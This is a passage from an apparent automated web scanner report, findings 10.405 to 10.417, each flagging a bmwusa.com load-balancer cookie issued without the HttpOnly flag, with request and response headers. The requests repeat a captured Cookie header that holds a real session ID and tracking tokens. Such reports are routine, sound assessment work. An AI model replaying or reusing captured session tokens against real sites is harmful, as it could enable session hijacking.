Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:07 GMT;path=/
Content-Length: 229245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.405. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:55 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:55 GMT;path=/
Content-Length: 229246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.406. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:10 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:10 GMT;path=/
Content-Length: 215531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.407. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:49 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:49 GMT;path=/
Content-Length: 215532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.408. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:51 GMT;path=/
Content-Length: 202378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.409. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:18:17 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:18:17 GMT;path=/
Content-Length: 195775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.410. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/x6explore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/x6explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:12 GMT;path=/
Content-Length: 179285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.411. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:21 GMT;path=/
Content-Length: 212726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.412. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:25 GMT;path=/
Content-Length: 226005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.413. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:58 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:58 GMT;path=/
Content-Length: 215485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.414. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:22:32 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:02:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:22:32 GMT;path=/
Content-Length: 202207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.415. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:56 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:56 GMT;path=/
Content-Length: 212730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.416. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:38 GMT;path=/
Content-Length: 226194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.417. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
